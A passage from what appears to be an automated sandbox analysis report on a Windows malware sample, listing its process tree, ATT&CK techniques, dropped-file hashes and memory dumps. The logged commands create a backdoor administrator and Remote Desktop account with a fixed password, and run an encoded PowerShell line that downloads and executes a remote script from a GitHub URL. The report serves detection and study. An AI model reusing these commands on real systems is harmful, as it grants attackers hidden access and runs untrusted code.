    PID:3468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4928

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:736

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc iKwNnDSI /add
1⤵
- Suspicious use of WriteProcessMemory
PID:536
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc iKwNnDSI /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc iKwNnDSI /add
    3⤵
    PID:3364

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4204
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1744

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" PPYYQNPR$ /ADD
1⤵
PID:2072
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" PPYYQNPR$ /ADD
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" PPYYQNPR$ /ADD
    3⤵
    PID:2592

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3628
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2492

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc iKwNnDSI
1⤵
PID:3284
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc iKwNnDSI
  2⤵
  PID:4144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc iKwNnDSI
    3⤵
    PID:2420

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4540
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:2160

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:244
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2020

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1664
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES80E8.tmp

Filesize
1KB

MD5
94b2a9cfaf72f3a3d05646d464b3869b

SHA1
5cb1316b0693c38017575b73f2a35a01e56fa497

SHA256
3561958701c3bf8832c9e53c0a5cd872f6e836cdacb8d68abe5ecc2eb02c3d29

SHA512
dc65b73e8ba25a87b6986a3681941a53d239a492e0a5cab22fdec32eafcba69d6da83d703a75f137ec0025587d9e2c8bd498e49d91316ef974c49548daaaad82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnvnvagm.4zj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bqznyrpa\bqznyrpa.dll

Filesize
3KB

MD5
056a9a551212ec6791438d4dc975966d

SHA1
106db7f3171b85cb887b231f73e915465e113e38

SHA256
03aa2e618e7c5c78d82abb3bc12fcbf9b2105092e3fb61b6425f20babc7a9977

SHA512
d6951da6bc1c37b2c30252465d8f6606488c1236ffac980751efb8edd545dab0b687bc184b060ad23fefc3d66cf971fe47ccf5d4cd3de9364cd882d06c2bbdc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
267dcb46e91e0272aab1994b2cf3c9d8

SHA1
7904af5372cec88161ce77f474d2e5deb119821e

SHA256
c319e5b97653ef90e065aaac0c0ad5d2d3a2bfa3de4ccb6abe16d9437b941a21

SHA512
44c76b401ded2501a18e624b95599945768b58f0c04cd500b4713231b19657352f11c16a0abf5dab18403db162aa07c7f55404beacf86da73dad83cea969cdf8

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
c678a2362862a3207f41213684b4923c

SHA1
d33bd5dd67c81d7da3582eeab75702ae9d0d4bf8

SHA256
18b4505916f75075a71d5d94e9fcd18e5e283690f3e6f06f8a3cb4c4d557dc76

SHA512
a4dc8c2fd294433016cf88a9b830940c78ecec0b600d4f2480a1bf68a3817160e188bc1c06e913bf475ed90021bf464ed9cdf1a7ce53977c12c6679650f37a53

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
22d3d81009b0fbcc977658e4a392c17c

SHA1
1f3f415cb3493bcb02fff0368f2f4a4bc91b8bc1

SHA256
9ebeb231fc50b2739a7d96c3f761cbdacdc003361fa69c6330ea83b619d35a07

SHA512
ff89e594e2e797516379c29fee5181e0de3b9a03c7c03e09da0ad26bf27e0e405164f24ee7a7caf09cb264b228ddfb6a685b741a4f1545256e21d239284817ee

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3498.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bqznyrpa\CSCF0DDA5B187FD41F497F95DE4F633C7.TMP

Filesize
652B

MD5
773506367f42671c18997888329522d7

SHA1
13922e635fcd9177ee6e86f75a15a8ea365b1e65

SHA256
39aeb7e0e122a2d3f8167e986a449bec87855d79bfbd97479de82d02d00b132c

SHA512
fa8880be8f22e96e25d7bde408cd6f0d1c6d4b1141c8a40e92d5e464620532ca62e6b8fd073070b65de120da680957adc8763e51016b638cdf599c466e53e033

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bqznyrpa\bqznyrpa.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bqznyrpa\bqznyrpa.cmdline

Filesize
369B

MD5
cfa825e61e4d8d78d03478a803168a23

SHA1
7795b7dbf2de16f1c6c9bad8cb2d0bfcc639c8b3

SHA256
b6a0db815f6a79de3978835fbdbca5c780127e3c268429ca630819b7e4778ecc

SHA512
29b8d0a63a5a3a3eaf3d206418b90ec35c9cc6ed00ef0eebc2a028e5772a7164843b9ce60ee2ed1fa47e03a7cbaf5a4be79ea650e85cdba09f527f865e978ba7

Download Submit
memory/780-52-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/780-53-0x000002936C5D0000-0x000002936C5E0000-memory.dmp

Filesize
64KB

Download
memory/780-54-0x000002936C5D0000-0x000002936C5E0000-memory.dmp

Filesize
64KB

Download
memory/780-55-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1640-91-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1640-37-0x0000022116A60000-0x0000022116A68000-memory.dmp

Filesize
32KB

Download
memory/1640-40-0x000002212F850000-0x000002212F9C6000-memory.dmp

Filesize
1.5MB

Download
memory/1640-41-0x000002212FBE0000-0x000002212FDEA000-memory.dmp

Filesize
2.0MB

Download
memory/1640-167-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1640-23-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1640-22-0x000002212F440000-0x000002212F462000-memory.dmp

Filesize
136KB

Download
memory/1640-18-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1640-11-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1640-166-0x00007FFE5E250000-0x00007FFE5E269000-memory.dmp

Filesize
100KB

Download
memory/1640-162-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1640-87-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1640-88-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1640-80-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1640-90-0x00007FFE5E250000-0x00007FFE5E269000-memory.dmp

Filesize
100KB

Download
memory/1640-96-0x0000022116950000-0x0000022116960000-memory.dmp

Filesize
64KB

Download
memory/1836-125-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/1836-126-0x0000020F77D00000-0x0000020F77D10000-memory.dmp

Filesize
64KB

Download
memory/1836-127-0x0000020F77D00000-0x0000020F77D10000-memory.dmp

Filesize
64KB

Download
memory/1836-160-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-74-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-81-0x000001847D810000-0x000001847D820000-memory.dmp

Filesize
64KB

Download
memory/2016-82-0x000001847D810000-0x000001847D820000-memory.dmp

Filesize
64KB

Download
memory/2016-89-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-57-0x000001E0BE0F0000-0x000001E0BE100000-memory.dmp

Filesize
64KB

Download
memory/4892-73-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-58-0x000001E0BE0F0000-0x000001E0BE100000-memory.dmp

Filesize
64KB

Download
memory/4892-72-0x000001E0BE0F0000-0x000001E0BE100000-memory.dmp

Filesize
64KB

Download
memory/4892-62-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/5008-5-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/5008-7-0x000001B4F6B00000-0x000001B4F6B10000-memory.dmp

Filesize
64KB

Download
memory/5008-6-0x000001B4F6B00000-0x000001B4F6B10000-memory.dmp

Filesize
64KB

Download
memory/5008-8-0x000001B4F6B00000-0x000001B4F6B10000-memory.dmp

Filesize
64KB

Download
memory/5008-59-0x000001B4F6B00000-0x000001B4F6B10000-memory.dmp

Filesize
64KB

Download
memory/5008-61-0x000001B4F6B00000-0x000001B4F6B10000-memory.dmp

Filesize
64KB

Download
memory/5008-4-0x000001B4F6F40000-0x000001B4F7366000-memory.dmp

Filesize
4.1MB

Download
memory/5008-60-0x000001B4F6B00000-0x000001B4F6B10000-memory.dmp

Filesize
64KB

Download
memory/5008-0-0x00000000006B0000-0x000000000155F000-memory.dmp

Filesize
14.7MB

Download
memory/5008-56-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download
memory/5008-42-0x000001B4F7540000-0x000001B4F76E9000-memory.dmp

Filesize
1.7MB

Download
memory/5008-169-0x000001B4F7540000-0x000001B4F76E9000-memory.dmp

Filesize
1.7MB

Download
memory/5008-170-0x00007FFE50010000-0x00007FFE50AD1000-memory.dmp

Filesize
10.8MB

Download